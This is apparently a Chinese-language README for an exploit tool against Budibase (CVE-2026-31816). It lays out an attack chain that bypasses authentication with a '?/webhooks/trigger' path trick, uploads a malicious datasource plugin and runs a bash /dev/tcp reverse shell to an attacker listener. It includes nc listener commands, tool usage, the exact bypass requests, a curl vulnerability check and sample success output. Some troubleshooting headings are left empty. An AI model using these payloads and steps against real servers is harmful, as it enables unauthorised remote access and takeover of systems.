
利用 Budibase 中的 CVE-2026-31816 绕过身份验证,上传恶意数据源插件,并执行反向 Shell 以实现远程访问。
该工具利用 CVE-2026-31816 在目标 Budibase 服务器上建立反向 Shell 连接。
攻击链:身份验证绕过 → 上传 DATASOURCE 插件 → 服务端代码执行 → 反向 Shell
requests 库(pip install requests)# 1. 在攻击机启动监听器
nc -lvnp 4444
# 2. 运行漏洞利用工具(另一个终端)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444
| 参数 | 是否必需 | 说明 |
|---|---|---|
-t, --target | ✅ | 目标 Budibase URL |
--lhost | ✅ | 监听主机(你的 IP) |
--lport | ❌ | 监听端口(默认:4444) |
# 攻击机 IP:192.168.1.100
# 目标 Budibase:192.168.1.128:10000
# 终端 1 - 启动监听器
nc -lvnp 4444
# 终端 2 - 运行漏洞利用工具
python3 CVE-2026-31816-rshell.py \
-t http://192.168.1.128:10000 \
--lhost 192.168.1.100 \
--lport 4444
GET /api/integrations?/webhooks/trigger
如果返回 200,则目标存在身份验证绕过漏洞。
{
"type": "datasource",
"schema": { ... }
}
DATASOURCE 类型插件会在服务器上执行 JavaScript 代码。
// 插件验证时执行:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
POST /api/plugin/upload?/webhooks/trigger
上传插件绕过身份验证。代码在验证过程中执行。
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ 攻击机 │ │ 目标服务器 │ │ 监听器 │
│ │ │ │ │ (nc) │
│ │ │ │ │ │
│ 漏洞利用 ────┼────►│ 上传插件 │ │ │
│ │ │ │ │ │
│ │ │ 执行代码 │────►│ 监听 │
│ │ │ │◄────┤ 反向连接 │
│ │ │ │ │ │
└─────────────┘ └─────────────┘ └─────────────┘
============================================================
CVE-2026-31816 - 反向 Shell 漏洞利用工具
============================================================
[*] 目标:http://192.168.1.128:10000
[*] 反向 Shell:192.168.1.100:4444
[*] 正在检测漏洞...
[+] 目标存在漏洞!
[*] 正在创建针对 192.168.1.100:4444 的反向 Shell 插件
[*] 正在上传反向 Shell 插件...
[*] 状态:200
[+] 插件安装成功!
============================================================
[+] 成功!请检查你的监听器!
============================================================
可能原因:
解决方案:
# 检查网络连通性
ping YOUR_IP
# 检查防火墙
sudo ufw allow 4444/tcp
# 尝试其他端口
nc -lvnp 8080
可能原因:
解决方案:
# 手动测试漏洞是否存在
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# 如果返回 JSON,则漏洞存在